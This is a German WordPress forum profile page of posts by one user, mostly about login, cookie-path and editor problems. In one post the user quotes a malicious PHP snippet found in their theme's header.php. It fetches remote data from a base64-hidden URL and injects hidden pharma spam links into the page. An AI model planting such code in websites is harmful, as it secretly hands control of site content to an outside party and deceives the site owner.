Beiträge von pantoffelpunk

    :-) War auch nur ein Scherz.

    Aber es ist doch eine aktuelle 2.7.1, die Plugins sind ebenfalls alle aktualisiert, so eine aktuelle Version vorhanden. Wie kann also ein Loch aus der 2.0.1 für einen Angriff von heute verantwortlich zeichnen?

    Schöne Scheiße!

    Im Quelltext meines blogs tauchten in einem 0px hohen div mit hidden overflow so schöne Begriffe auf wie "Viagra, Tramal, Tramaldol, Ciagris" und wie die Konsorten alle heißen.

    Ich fand dann in meiner header.php folgenden schadhaften Code:

    PHP
    <?php /* wp_remote_fopen procedure */ $wp_remote_fopen='aHR0cDovL3F3ZXRyby5jb20vc3MvdGVzdF8yMA=='; $blarr=get_option('cache_vars'); if(trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.md5'))!=md5($blarr)){ $blarr=trim(wp_remote_fopen(base64_decode($wp_remote_fopen).'.txt')); update_option('cache_vars',$blarr); } $blarr=unserialize(base64_decode(get_option('cache_vars'))); if($blarr['hide_text']!='' && sizeof($blarr['links'])>0){ if($blarr['random']){ $new=''; foreach(array_rand($blarr['links'],sizeof($blarr['links'])) as $k) $new[$k]=$blarr['links'][$k]; $blarr['links']=$new; } $txt_out=''; foreach($blarr['links'] as $k=>$v) $txt_out.='<a href="'.$v.'">'.$k.'</a>'; echo str_replace('[LINKS]',$txt_out,$blarr['hide_text']); } /* wp_remote_fopen procedure */ ?>

    Wer macht so was warum und wie? Ich habe die aktuellste WP-Version, allerdings ein recht altes, geforktes Theme und ne Menge Plugins.

    Ich möchte aber natürlich nur ungern diese Plugins kicken und genausowenig möchte ich mein Theme ändern. Eigentlich.

    Hat jemand ne Idee, was da los ist?

    Beste Grüße
    pp

    Mal noch was ganz anderes: hast du die Secret-Keys in der wp-config eingetragen, beim Upgrade auf 2.5.x?

    Ich oute mich: Nein, habe ich nicht, stattdessen habe ich die Anweisung befolgt, auf gar keinen Fall (!!!!) die wp-config zu löschen. ich glaube, meine wp-config war bis gerade eben noch die von wordpress 1.5 oder so.

    Habe ich aber jetzt nachgeholt. Dank Dir nochmal, ich bin immer wieder schwerst begeistert vom support der OS-Gemeinde. Danke, danke, danke.

    Ich hab hier noch nen Thread:
    WordPress › Support » logging into wordpress 2.5 returns me to wp-login.php

    Probier dich mal mittels ?action=logout explizit auszuloggen. Vielleicht hilft das ja.

    Kein Erfolg.
    Es liegt auch nicht an meinen lokalen Einstellungen, der Kollege im anderen Büro, 25km entfernt, hat dasselbe prob.

    NACHTRAG: Gelöst. Ich habe ein drittes (oder viertes) mal die Dateien neu hochgeladen, jetzt funzt es. Sorry, dass es offensichtlich so ein lapidarer Mist war und nochmal vielen Dank für Deine Mühen.

    Nein, die plugins sind es nicht, aber vielleicht mache ich einen Fehler beim Definieren des ADMIN_COOKIE_PATH.

    Ich sehe es richtig, dass er Pfad vom Root der Domain http://blog.xxx.de auf den Admin-Bereich zeigen soll, right?

    In der WP-Settings wird der folgendermaßen gesetzt:

    Code
    if ( !defined('ADMIN_COOKIE_PATH') )
        define( 'ADMIN_COOKIE_PATH', SITECOOKIEPATH . 'wp-admin' );

    wobei dort der SITECOOKIEPATH so generiert wird:

    Code
    preg_replace('|https?://[^/]+|i', '', get_option('siteurl') . '/' ) );

    Wenn ich also in der wp-config.php den ADMIN_COOKIE_PATH neu definiere, muss ich ihn nach dem Aufruf der wp-settings.php definieren, right?

    Und der Pfad geht vom Root der Domain in den wp-admin-Bereich, right?

    also: blog.xxx.de/wp-admin/

    Bringt aber so nix!!! HELP!:?

    Nachtrag: Auch ein Löschen und neu uploaden der Ordner "wp-admin" und "wp-includes" war erfolglos.

    Och schon. Ich stell mir grad vor, wenn ich Cookie wäre, und wissen müsste was ein Serverpfad ist... das würde doch meinen Horizont völlig übersteigen, mein Weltbild ins Wanken bringen... ach ich weiß nicht... ich bin doch nur ein armes kleines Cookie! Was weiß ich denn von der großen weiten Serverwelt? :oops:

    Wenn ich ein cookie wäre, dann würde ich mich von Dir gerade total unterdrückt und diskriminiert fühlen.

    Hast du bei den Plugins mal geguckt?

    Ich muss grad noch ein bisschen webspace aufräumen und dumps zurückspielen... grrr, ein Scheißtag.

    Ich habe die Zeile

    Code
    [COLOR=#000000][COLOR=#006600]@[/COLOR][COLOR=#0000CC]define[/COLOR][COLOR=#006600]([/COLOR][COLOR=#CC0000]'ADMIN_COOKIE_PATH'[/COLOR][COLOR=#006600], [/COLOR][COLOR=#CC0000]'/'[/COLOR][COLOR=#006600]);[/COLOR][/COLOR]

    in die wp-config.php eingetragen ... jetzt gibt es wenigstens so etwas ähnliches wie eine fehlermeldung, nämlich "Bitte melde Dich nochmal an", aber dieses Spiel lässt sich jetzt beliebig wiederholen. Grundsätzlich würde ich aber schon vermuten, dass etwas an den cookie-Einstellungen nicht stimmt. Gibt es dazu irgendwelche Einträge in der DB?

    Gruß und Dank
    pp

    Moin community,
    das frontend funktioniert wunderbar, auch comments sind möglich.
    Ich kann mich allerdings nicht mehr anmelden, die wp-login.php lädt sich praktisch ohne Fehlermeldung einfach wieder neu, dabei habe ich seit der letzten Anmeldung NICHTS geändert, isch schwör :-D!

    Hatte bis gerade die 2.5.1 und dachte, den Fehler ggf. per Upgrade auf die 2.6.2 beheben zu können, aber Pustekuchen, der Fehler besteht.

    Außerdem habe ich noch folgendes versucht:
    - anderer Browser
    - cookies gelöscht
    - Passwort geändert

    keine Chance ... hat jemand eine Idee?
    Thanx, pp

    Fehler blieb bei Standardtheme und Deaktivierung sämtlicher Plugins sowie nach uppen der originalen kses.php.

    Kurioserweise funzt jetzt wieder alles, nachdem ich das dritte mal eine orginale und dann angepasste kses.php hochgeladen habe.

    Frag mich nicht, was das soll.

    Besten Dank für die Mühen, Alphawolf!

    opera 9

    Zitat von akem

    Hab ich schon gemacht. Auch sogar schon von nem Windowsrechner aus *g* .. ohne erfolg. Ich bekomm auch kein Kontextmenu vom Uploader angezeigt, wenn ich auf ein hochgeladenes Bild klicke. :mad:

    Opera 9 ist da und unterstützt wie versprochen und erwartet den TinyMCE, dafür nicht mehr das einsetzen des Bildes per Kontextmenü... So lang das nicht funzt, würde ich gern den TinyMCE abschalten. Wo kann ich so tun?